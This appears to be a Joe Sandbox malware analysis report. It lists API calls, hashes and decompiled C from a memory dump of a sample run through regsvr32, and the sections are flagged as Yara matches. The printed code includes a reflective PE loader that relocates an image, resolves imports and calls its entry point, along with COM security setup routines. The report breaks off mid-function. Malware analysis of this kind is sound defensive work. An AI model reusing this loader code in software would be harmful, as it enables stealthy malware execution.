                                                                                                                                                                                              • GetCommandLineW.KERNEL32 ref: 04AFDE3B
                                                                                                                                                                                              • CommandLineToArgvW.SHELL32(00000000,00000000), ref: 04AFDE46
                                                                                                                                                                                              • lstrlenW.KERNEL32 ref: 04AFDE88
                                                                                                                                                                                              • GetCurrentDirectoryW.KERNEL32(00000104,?), ref: 04AFDEE1
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,00000000,00000104), ref: 04AFDF06
                                                                                                                                                                                              • lstrcpynW.KERNEL32(?,?,00000104), ref: 04AFDF24
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: CommandLinelstrcpyn$ArgvCurrentDirectorylstrlen
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1259063344-0
                                                                                                                                                                                              • Opcode ID: 45ddbb497e0699cf0d01326d393b0622fe790283ebbb3297a13da561601d1e0e
                                                                                                                                                                                              • Instruction ID: 0ae5027444643c1abc018bdb52d7d60ed7b1168bcbcfe51e7c7d5785cca2951c
                                                                                                                                                                                              • Opcode Fuzzy Hash: 45ddbb497e0699cf0d01326d393b0622fe790283ebbb3297a13da561601d1e0e
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7B31F2B1900116EBDB26ABE4CC88EADB779EF11311F10455AF607E7090E770A981CB50
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFE66A
                                                                                                                                                                                              • SysAllocString.OLEAUT32(?), ref: 04AFE672
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFE686
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFE701
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFE704
                                                                                                                                                                                              • SysFreeString.OLEAUT32(?), ref: 04AFE709
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: String$AllocFree
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 344208780-0
                                                                                                                                                                                              • Opcode ID: ba6d8948a74a80cd49d99dca50d32ffa8c99d68dc9488645b2141899a51fc5b1
                                                                                                                                                                                              • Instruction ID: c36ef7954805e68c00062e695b22baa3747d09cc974a96ba3bfa1ef71bcafac5
                                                                                                                                                                                              • Opcode Fuzzy Hash: ba6d8948a74a80cd49d99dca50d32ffa8c99d68dc9488645b2141899a51fc5b1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 4C21DDB5900218BFDB04DFE9CD88DAFBBBDEF48654B10445AF505E7250EA71AE01DB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 20%
                                                                                                                                                                                              			E04B03D66(intOrPtr _a4, intOrPtr _a8, intOrPtr* _a12, CHAR* _a16, intOrPtr _a20) {
                                                                                                                                                                                              				signed int _v5;
                                                                                                                                                                                              				signed short _v12;
                                                                                                                                                                                              				intOrPtr* _v16;
                                                                                                                                                                                              				intOrPtr _v20;
                                                                                                                                                                                              				signed int* _v24;
                                                                                                                                                                                              				unsigned int _v28;
                                                                                                                                                                                              				signed short* _v32;
                                                                                                                                                                                              				struct HINSTANCE__* _v36;
                                                                                                                                                                                              				signed int _v40;
                                                                                                                                                                                              				signed int _v44;
                                                                                                                                                                                              				intOrPtr* _v48;
                                                                                                                                                                                              				signed short* _v52;
                                                                                                                                                                                              				intOrPtr _v56;
                                                                                                                                                                                              				unsigned int _v60;
                                                                                                                                                                                              				intOrPtr _v64;
                                                                                                                                                                                              				_Unknown_base(*)()* _v68;
                                                                                                                                                                                              				signed int _v72;
                                                                                                                                                                                              				intOrPtr _v76;
                                                                                                                                                                                              				intOrPtr _v80;
                                                                                                                                                                                              				intOrPtr _v84;
                                                                                                                                                                                              				unsigned int _v88;
                                                                                                                                                                                              				intOrPtr _v92;
                                                                                                                                                                                              				signed int _v96;
                                                                                                                                                                                              				intOrPtr _v100;
                                                                                                                                                                                              				intOrPtr _v104;
                                                                                                                                                                                              				intOrPtr _v108;
                                                                                                                                                                                              				intOrPtr _v112;
                                                                                                                                                                                              				CHAR* _v116;
                                                                                                                                                                                              				signed int _v120;
                                                                                                                                                                                              				intOrPtr _v124;
                                                                                                                                                                                              				signed int _v128;
                                                                                                                                                                                              				signed int _v132;
                                                                                                                                                                                              				signed int _t216;
                                                                                                                                                                                              				signed int _t233;
                                                                                                                                                                                              				void* _t273;
                                                                                                                                                                                              				signed int _t278;
                                                                                                                                                                                              				signed int _t280;
                                                                                                                                                                                              				intOrPtr _t320;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v44 = _v44 & 0x00000000;
                                                                                                                                                                                              				_v84 =  *((intOrPtr*)(_a4 + 0x3c)) + _a4;
                                                                                                                                                                                              				_v20 = _v84;
                                                                                                                                                                                              				_t320 = _a4 -  *((intOrPtr*)(_v20 + 0x34));
                                                                                                                                                                                              				_v64 = _t320;
                                                                                                                                                                                              				if(_t320 == 0) {
                                                                                                                                                                                              					L13:
                                                                                                                                                                                              					while(0 != 0) {
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(8);
                                                                                                                                                                                              					if( *((intOrPtr*)(_v20 + 0xbadc25)) == 0) {
                                                                                                                                                                                              						L35:
                                                                                                                                                                                              						if(_a16 == 0) {
                                                                                                                                                                                              							L54:
                                                                                                                                                                                              							_v80 =  *((intOrPtr*)(_v20 + 0x28)) + _a4;
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_a12 != 0) {
                                                                                                                                                                                              								 *_a12 = _v80;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							 *((intOrPtr*)(_v20 + 0x34)) = _a4;
                                                                                                                                                                                              							_v124 = _v80(_a4, 1, _a8);
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							if(_v124 != 0) {
                                                                                                                                                                                              								if(_v44 == 0) {
                                                                                                                                                                                              									L77:
                                                                                                                                                                                              									return 1;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if(_a20 != 1) {
                                                                                                                                                                                              									if(_a20 != 2) {
                                                                                                                                                                                              										L75:
                                                                                                                                                                                              										while(0 != 0) {
                                                                                                                                                                                              										}
                                                                                                                                                                                              										goto L77;
                                                                                                                                                                                              									}
                                                                                                                                                                                              									while(0 != 0) {
                                                                                                                                                                                              									}
                                                                                                                                                                                              									_v132 = _v44;
                                                                                                                                                                                              									goto L75;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								while(0 != 0) {
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v44();
                                                                                                                                                                                              								goto L75;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							return 0;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while(0 != 0) {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_push(8);
                                                                                                                                                                                              						if( *((intOrPtr*)(_v20 + 0x78)) == 0) {
                                                                                                                                                                                              							goto L54;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v128 = 0x80000000;
                                                                                                                                                                                              						_t216 = 8;
                                                                                                                                                                                              						_v76 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t216 * 0));
                                                                                                                                                                                              						_v108 = _a4 +  *((intOrPtr*)(_v76 + 0x20));
                                                                                                                                                                                              						_v112 = _a4 +  *((intOrPtr*)(_v76 + 0x1c));
                                                                                                                                                                                              						_v104 =  *((intOrPtr*)(_v76 + 0x18));
                                                                                                                                                                                              						while(0 != 0) {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v40 = _v40 & 0x00000000;
                                                                                                                                                                                              						while(_v40 < _v104) {
                                                                                                                                                                                              							_v116 = _a4 +  *((intOrPtr*)(_v108 + _v40 * 4));
                                                                                                                                                                                              							_v120 = _a4 +  *((intOrPtr*)(_v112 + _v40 * 4));
                                                                                                                                                                                              							if(lstrcmpA(_v116, _a16) != 0) {
                                                                                                                                                                                              								_v40 = _v40 + 1;
                                                                                                                                                                                              								continue;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							while(0 != 0) {
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v44 = _v120;
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v44 != 0) {
                                                                                                                                                                                              							goto L54;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while(0 != 0) {
                                                                                                                                                                                              						}
                                                                                                                                                                                              						return 0xffffffff;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v96 = 0x80000000;
                                                                                                                                                                                              					_t233 = 8;
                                                                                                                                                                                              					_v16 = _a4 +  *((intOrPtr*)(_v20 + (_t233 << 0) + 0x78));
                                                                                                                                                                                              					while( *((intOrPtr*)(_v16 + 0xc)) != 0) {
                                                                                                                                                                                              						_v36 = GetModuleHandleA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                              						if(_v36 == 0) {
                                                                                                                                                                                              							_v36 = LoadLibraryA( *((intOrPtr*)(_v16 + 0xc)) + _a4);
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_v36 != 0) {
                                                                                                                                                                                              							if( *_v16 == 0) {
                                                                                                                                                                                              								_v24 =  *((intOrPtr*)(_v16 + 0x10)) + _a4;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								_v24 =  *_v16 + _a4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v72 = _v72 & 0x00000000;
                                                                                                                                                                                              							while( *_v24 != 0) {
                                                                                                                                                                                              								if(( *_v24 & _v96) == 0) {
                                                                                                                                                                                              									_v100 =  *_v24 + _a4;
                                                                                                                                                                                              									_v68 = GetProcAddress(_v36, _v100 + 2);
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									_v68 = GetProcAddress(_v36,  *_v24 & 0x0000ffff);
                                                                                                                                                                                              								}
                                                                                                                                                                                              								if( *((intOrPtr*)(_v16 + 0x10)) == 0) {
                                                                                                                                                                                              									 *_v24 = _v68;
                                                                                                                                                                                              								} else {
                                                                                                                                                                                              									 *( *((intOrPtr*)(_v16 + 0x10)) + _a4 + _v72) = _v68;
                                                                                                                                                                                              								}
                                                                                                                                                                                              								_v24 =  &(_v24[1]);
                                                                                                                                                                                              								_v72 = _v72 + 4;
                                                                                                                                                                                              							}
                                                                                                                                                                                              							_v16 = _v16 + 0x14;
                                                                                                                                                                                              							continue;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t273 = 0xfffffffd;
                                                                                                                                                                                              							return _t273;
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              					goto L35;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t278 = 8;
                                                                                                                                                                                              				_v52 = _a4 +  *((intOrPtr*)(_v20 + 0x78 + _t278 * 5));
                                                                                                                                                                                              				_t280 = 8;
                                                                                                                                                                                              				_v56 =  *((intOrPtr*)(_v20 + 0x7c + _t280 * 5));
                                                                                                                                                                                              				while(0 != 0) {
                                                                                                                                                                                              				}
                                                                                                                                                                                              				while(_v56 > 0) {
                                                                                                                                                                                              					_v28 = _v52[2];
                                                                                                                                                                                              					_v56 = _v56 - _v28;
                                                                                                                                                                                              					_v28 = _v28 - 8;
                                                                                                                                                                                              					_v28 = _v28 >> 1;
                                                                                                                                                                                              					_v32 =  &(_v52[4]);
                                                                                                                                                                                              					_v92 = _a4 +  *_v52;
                                                                                                                                                                                              					_v60 = _v28;
                                                                                                                                                                                              					while(1) {
                                                                                                                                                                                              						_v88 = _v60;
                                                                                                                                                                                              						_v60 = _v60 - 1;
                                                                                                                                                                                              						if(_v88 == 0) {
                                                                                                                                                                                              							break;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v5 = ( *_v32 & 0x0000ffff) >> 0xc;
                                                                                                                                                                                              						_v12 =  *_v32 & 0xfff;
                                                                                                                                                                                              						_v48 = (_v12 & 0x0000ffff) + _v92;
                                                                                                                                                                                              						if((_v5 & 0x000000ff) != 3) {
                                                                                                                                                                                              							if((_v5 & 0x000000ff) == 0xa) {
                                                                                                                                                                                              								 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							 *_v48 =  *_v48 + _v64;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_v32 =  &(_v32[1]);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_v52 = _v32;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				goto L13;
                                                                                                                                                                                              			}

                                                                                                                                                                                              APIs
                                                                                                                                                                                              • GetModuleHandleA.KERNEL32(00000000), ref: 04B03ECD
                                                                                                                                                                                              • LoadLibraryA.KERNEL32(00000000), ref: 04B03EE6
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04B03F42
                                                                                                                                                                                              • GetProcAddress.KERNEL32(00000000,?), ref: 04B03F61
                                                                                                                                                                                              • lstrcmpA.KERNEL32(?,00000000), ref: 04B04052
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: AddressProc$HandleLibraryLoadModulelstrcmp
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1872726118-0
                                                                                                                                                                                              • Opcode ID: 0ab9375d0e0be7d7c4dbac88b34460595d6ea538ab35257e0aba848ba2b1dcd1
                                                                                                                                                                                              • Instruction ID: 12a23c712f0568105367221513c0b3995b4f6d049b1e1d5936390650d9daa469
                                                                                                                                                                                              • Opcode Fuzzy Hash: 0ab9375d0e0be7d7c4dbac88b34460595d6ea538ab35257e0aba848ba2b1dcd1
                                                                                                                                                                                              • Instruction Fuzzy Hash: 77E18274E00209DFDB14CFA8C984AADBBF1FF48355F148599E915EB391E734A981CB60
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID:
                                                                                                                                                                                              • String ID: @$\u%04X$\u%04X\u%04X
                                                                                                                                                                                              • API String ID: 0-2132903582
                                                                                                                                                                                              • Opcode ID: 15f3e2dac8f53c387b16bbc9cdbc5021c763a2e027e2a6dc39b8e69e0f8da536
                                                                                                                                                                                              • Instruction ID: 84b1092b1f2d8cb57967d436804e174ba9b806c79f0a0c229c51e85efdb0e5e0
                                                                                                                                                                                              • Opcode Fuzzy Hash: 15f3e2dac8f53c387b16bbc9cdbc5021c763a2e027e2a6dc39b8e69e0f8da536
                                                                                                                                                                                              • Instruction Fuzzy Hash: 7D41F571700205A7EB2C4EAC9D99BBE3E58DF41316F18C1D5F912E62D1F363F9628291
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 30%
                                                                                                                                                                                              			E04AFE400(void* __ecx) {
                                                                                                                                                                                              				char _v8;
                                                                                                                                                                                              				void* _v12;
                                                                                                                                                                                              				char* _t15;
                                                                                                                                                                                              				intOrPtr* _t16;
                                                                                                                                                                                              				void* _t21;
                                                                                                                                                                                              				intOrPtr* _t23;
                                                                                                                                                                                              				intOrPtr* _t24;
                                                                                                                                                                                              				intOrPtr* _t25;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				void* _t33;
                                                                                                                                                                                              
                                                                                                                                                                                              				_v12 = 0;
                                                                                                                                                                                              				_v8 = 0;
                                                                                                                                                                                              				__imp__CoInitializeEx(0, 0, _t30, _t33, __ecx, __ecx);
                                                                                                                                                                                              				__imp__CoInitializeSecurity(0, 0xffffffff, 0, 0, 0, 3, 0, 0, 0);
                                                                                                                                                                                              				_t15 =  &_v12;
                                                                                                                                                                                              				__imp__CoCreateInstance(0x4b0c868, 0, 1, 0x4b0c878, _t15);
                                                                                                                                                                                              				if(_t15 < 0) {
                                                                                                                                                                                              					L5:
                                                                                                                                                                                              					_t23 = _v8;
                                                                                                                                                                                              					if(_t23 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t23 + 8))(_t23);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t24 = _v12;
                                                                                                                                                                                              					if(_t24 != 0) {
                                                                                                                                                                                              						 *((intOrPtr*)( *_t24 + 8))(_t24);
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_t16 = 0;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					__imp__#2(__ecx);
                                                                                                                                                                                              					_t25 = _v12;
                                                                                                                                                                                              					_t21 =  *((intOrPtr*)( *_t25 + 0xc))(_t25, _t15, 0, 0, 0, 0, 0, 0,  &_v8);
                                                                                                                                                                                              					if(_t21 < 0) {
                                                                                                                                                                                              						goto L5;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						__imp__CoSetProxyBlanket(_v8, 0xa, 0, 0, 3, 3, 0, 0);
                                                                                                                                                                                              						if(_t21 < 0) {
                                                                                                                                                                                              							goto L5;
                                                                                                                                                                                              						} else {
                                                                                                                                                                                              							_t16 = E04AF8BDE(8);
                                                                                                                                                                                              							if(_t16 == 0) {
                                                                                                                                                                                              								goto L5;
                                                                                                                                                                                              							} else {
                                                                                                                                                                                              								 *((intOrPtr*)(_t16 + 4)) = _v12;
                                                                                                                                                                                              								 *_t16 = _v8;
                                                                                                                                                                                              							}
                                                                                                                                                                                              						}
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              				return _t16;
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              • CoInitializeEx.OLE32(00000000,00000000,00000000,?,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE413
                                                                                                                                                                                              • CoInitializeSecurity.OLE32(00000000,000000FF,00000000,00000000,00000000,00000003,00000000,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE424
                                                                                                                                                                                              • CoCreateInstance.OLE32(04B0C868,00000000,00000001,04B0C878,?,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE43B
                                                                                                                                                                                              • SysAllocString.OLEAUT32(00000000), ref: 04AFE446
                                                                                                                                                                                              • CoSetProxyBlanket.OLE32(00000000,0000000A,00000000,00000000,00000003,00000003,00000000,00000000,?,04AFE731,000009DA,00000000,?,00000000), ref: 04AFE471
                                                                                                                                                                                                • Part of subcall function 04AF8BDE: RtlAllocateHeap.NTDLL(00000008,?,?,04AF959D,00000100,?,04AF6507), ref: 04AF8BEC
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: Initialize$AllocAllocateBlanketCreateHeapInstanceProxySecurityString
                                                                                                                                                                                              • String ID:
                                                                                                                                                                                              • API String ID: 1610782348-0
                                                                                                                                                                                              • Opcode ID: d6db5c06ec06a913cecfedcbec8e15ad1537c8cae881d01ac1d374c9d71d35a5
                                                                                                                                                                                              • Instruction ID: 9f6ac03d8ddbdf1282c3661f44247826a4acf24410e36988a90c94fd6429544b
                                                                                                                                                                                              • Opcode Fuzzy Hash: d6db5c06ec06a913cecfedcbec8e15ad1537c8cae881d01ac1d374c9d71d35a5
                                                                                                                                                                                              • Instruction Fuzzy Hash: 6D210970700245BFDB249BA6CC4DE6BBF7CEFC6B16F10419DB605A72A1D675AA40CA30
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 83%
                                                                                                                                                                                              			E04B03379(void* __edi, char* _a4, intOrPtr _a8, long long _a12, signed int _a20) {
                                                                                                                                                                                              				signed int _t12;
                                                                                                                                                                                              				signed int _t13;
                                                                                                                                                                                              				signed int _t23;
                                                                                                                                                                                              				void* _t30;
                                                                                                                                                                                              				char* _t31;
                                                                                                                                                                                              				char* _t33;
                                                                                                                                                                                              				char* _t35;
                                                                                                                                                                                              				char* _t37;
                                                                                                                                                                                              				char* _t38;
                                                                                                                                                                                              				long long* _t40;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t30 = __edi;
                                                                                                                                                                                              				_t12 = _a20;
                                                                                                                                                                                              				if(_t12 == 0) {
                                                                                                                                                                                              					_t12 = 0x11;
                                                                                                                                                                                              				}
                                                                                                                                                                                              				_t35 = _a4;
                                                                                                                                                                                              				_push(_t25);
                                                                                                                                                                                              				 *_t40 = _a12;
                                                                                                                                                                                              				_push(_t12);
                                                                                                                                                                                              				_push("%.*g");
                                                                                                                                                                                              				_push(_a8);
                                                                                                                                                                                              				_push(_t35);
                                                                                                                                                                                              				L04B034D2();
                                                                                                                                                                                              				_t23 = _t12;
                                                                                                                                                                                              				if(_t23 < 0 || _t23 >= _a8) {
                                                                                                                                                                                              					L16:
                                                                                                                                                                                              					_t13 = _t12 | 0xffffffff;
                                                                                                                                                                                              					goto L17;
                                                                                                                                                                                              				} else {
                                                                                                                                                                                              					E04B03352(_t12, _t35);
                                                                                                                                                                                              					if(strchr(_t35, 0x2e) != 0 || strchr(_t35, 0x65) != 0) {
                                                                                                                                                                                              						L8:
                                                                                                                                                                                              						_push(_t30);
                                                                                                                                                                                              						_t37 = strchr(_t35, 0x65);
                                                                                                                                                                                              						_t31 = _t37;
                                                                                                                                                                                              						if(_t37 == 0) {
                                                                                                                                                                                              							L15:
                                                                                                                                                                                              							_t13 = _t23;
                                                                                                                                                                                              							L17:
                                                                                                                                                                                              							return _t13;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t38 = _t37 + 1;
                                                                                                                                                                                              						_t33 = _t31 + 2;
                                                                                                                                                                                              						if( *_t38 == 0x2d) {
                                                                                                                                                                                              							_t38 = _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						while( *_t33 == 0x30) {
                                                                                                                                                                                              							_t33 = _t33 + 1;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						if(_t33 != _t38) {
                                                                                                                                                                                              							E04AF8CE0(_t38, _t33, _t23 - _t33 + _a4);
                                                                                                                                                                                              							_t23 = _t23 + _t38 - _t33;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						goto L15;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t6 = _t23 + 3; // 0x4b01b64
                                                                                                                                                                                              						_t12 = _t6;
                                                                                                                                                                                              						if(_t12 >= _a8) {
                                                                                                                                                                                              							goto L16;
                                                                                                                                                                                              						}
                                                                                                                                                                                              						_t35[_t23] = 0x302e;
                                                                                                                                                                                              						( &(_t35[2]))[_t23] = 0;
                                                                                                                                                                                              						_t23 = _t23 + 2;
                                                                                                                                                                                              						goto L8;
                                                                                                                                                                                              					}
                                                                                                                                                                                              				}
                                                                                                                                                                                              			}














                                                                                                                                                                                              APIs
                                                                                                                                                                                              Strings
                                                                                                                                                                                              Memory Dump Source
                                                                                                                                                                                              • Source File: 0000001D.00000002.677381377.0000000004AF0000.00000040.00001000.00020000.00000000.sdmp, Offset: 04AF0000, based on PE: true
                                                                                                                                                                                              Joe Sandbox IDA Plugin
                                                                                                                                                                                              • Snapshot File: hcaresult_29_2_4af0000_regsvr32.jbxd
                                                                                                                                                                                              Yara matches
                                                                                                                                                                                              Similarity
                                                                                                                                                                                              • API ID: strchr$_snprintf
                                                                                                                                                                                              • String ID: %.*g
                                                                                                                                                                                              • API String ID: 3619936089-952554281
                                                                                                                                                                                              • Opcode ID: 53bea87bb11a31a4ead5ff2714c37641b363e5f78d5a345385e234f468d9b086
                                                                                                                                                                                              • Instruction ID: d505d21bb438b08be5059bae18076ce51d96674c861c647e336baa3f081fb012
                                                                                                                                                                                              • Opcode Fuzzy Hash: 53bea87bb11a31a4ead5ff2714c37641b363e5f78d5a345385e234f468d9b086
                                                                                                                                                                                              • Instruction Fuzzy Hash: 452135626446152AEB225E9CDC89F9E3FC8EF01366F58E495FD409E1C0E7A1F9414390
                                                                                                                                                                                              Uniqueness

                                                                                                                                                                                              Uniqueness Score: -1.00%

                                                                                                                                                                                              C-Code - Quality: 64%
                                                                                                                                                                                              			E04AF377F(void* __fp0) {
                                                                                                                                                                                              				signed int _v144;
                                                                                                                                                                                              				signed int _v152;
                                                                                                                                                                                              				char _v160;
                                                                                                                                                                                              				char _v164;
                                                                                                                                                                                              				char _v168;
                                                                                                                                                                                              				signed int _v172;
                                                                                                                                                                                              				char _v176;
                                                                                                                                                                                              				intOrPtr _v180;
                                                                                                                                                                                              				signed int _v184;
                                                                                                                                                                                              				signed int _v188;
                                                                                                                                                                                              				signed int _v192;
                                                                                                                                                                                              				signed int _v196;
                                                                                                                                                                                              				char _v200;
                                                                                                                                                                                              				signed int _v204;
                                                                                                                                                                                              				intOrPtr _t72;
                                                                                                                                                                                              				intOrPtr _t75;
                                                                                                                                                                                              				signed int _t80;
                                                                                                                                                                                              				signed int _t81;
                                                                                                                                                                                              				signed int _t84;
                                                                                                                                                                                              				signed int _t87;
                                                                                                                                                                                              				signed int _t88;
                                                                                                                                                                                              				signed int _t100;
                                                                                                                                                                                              				void* _t102;
                                                                                                                                                                                              				void* _t103;
                                                                                                                                                                                              				unsigned int* _t104;
                                                                                                                                                                                              				signed int _t110;
                                                                                                                                                                                              				signed int _t113;
                                                                                                                                                                                              				void* _t118;
                                                                                                                                                                                              				intOrPtr _t124;
                                                                                                                                                                                              				signed int _t127;
                                                                                                                                                                                              				intOrPtr _t129;
                                                                                                                                                                                              				intOrPtr _t132;
                                                                                                                                                                                              				void* _t133;
                                                                                                                                                                                              				void* _t137;
                                                                                                                                                                                              				signed int _t146;
                                                                                                                                                                                              				signed int _t148;
                                                                                                                                                                                              				signed short* _t149;
                                                                                                                                                                                              				signed int _t159;
                                                                                                                                                                                              				intOrPtr* _t183;
                                                                                                                                                                                              				void* _t187;
                                                                                                                                                                                              				void* _t188;
                                                                                                                                                                                              				void* _t189;
                                                                                                                                                                                              				signed short* _t192;
                                                                                                                                                                                              				void* _t196;
                                                                                                                                                                                              				signed int _t199;
                                                                                                                                                                                              				signed int _t200;
                                                                                                                                                                                              				signed int _t203;
                                                                                                                                                                                              				signed int _t204;
                                                                                                                                                                                              				char _t205;
                                                                                                                                                                                              				signed int _t206;
                                                                                                                                                                                              				void* _t208;
                                                                                                                                                                                              				void* _t214;
                                                                                                                                                                                              				void* _t221;
                                                                                                                                                                                              
                                                                                                                                                                                              				_t221 = __fp0;
                                                                                                                                                                                              				_t208 = (_t206 & 0xfffffff8) - 0xac;
                                                                                                                                                                                              				_v144 = 0;
                                                                                                                                                                                              				_v172 = 0;
                                                                                                                                                                                              				while(1) {
                                                                                                                                                                                              					_t72 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( *0x4b0f804);
                                                                                                                                                                                              					_v152 = 0;
                                                                                                                                                                                              					if( *((intOrPtr*)(_t72 + 0xe0))() == 0 && GetLastError() != 0x217) {
                                                                                                                                                                                              						break;
                                                                                                                                                                                              					}
                                                                                                                                                                                              					_push(0);
                                                                                                                                                                                              					_push( &_v160);
                                                                                                                                                                                              					_t75 =  *0x4b0f818; // 0x4c2f8b0
                                                                                                                                                                                              					_push(0x80000);
                                                                                                                                                                                              					_push( *0x4b0f8bc);
                                                                                                                                                                                              					_push( *0x4b0f804);
                                                                                                                                                                                              					if( *((intOrPtr*)(_t75 + 0x90))() == 0 || _v180 == 0) {
                                                                                                                                                                                              						GetLastError();
                                                                                                                                                                                              						goto L56;
                                                                                                                                                                                              					} else {
                                                                                                                                                                                              						_t149 =  *0x4b0f8bc; // 0x0
                                                                                                                                                                                              						_t80 =  *_t149 & 0x0000ffff;
                                                                                                                                                                                              						_t214 = _t80 - 8;
                                                                                                                                                                                              						if(_t214 > 0) {
                                                                                                                                                                                              							_t81 = _t80 - 9;
                                                                                                                                                                                              							__eflags = _t81;
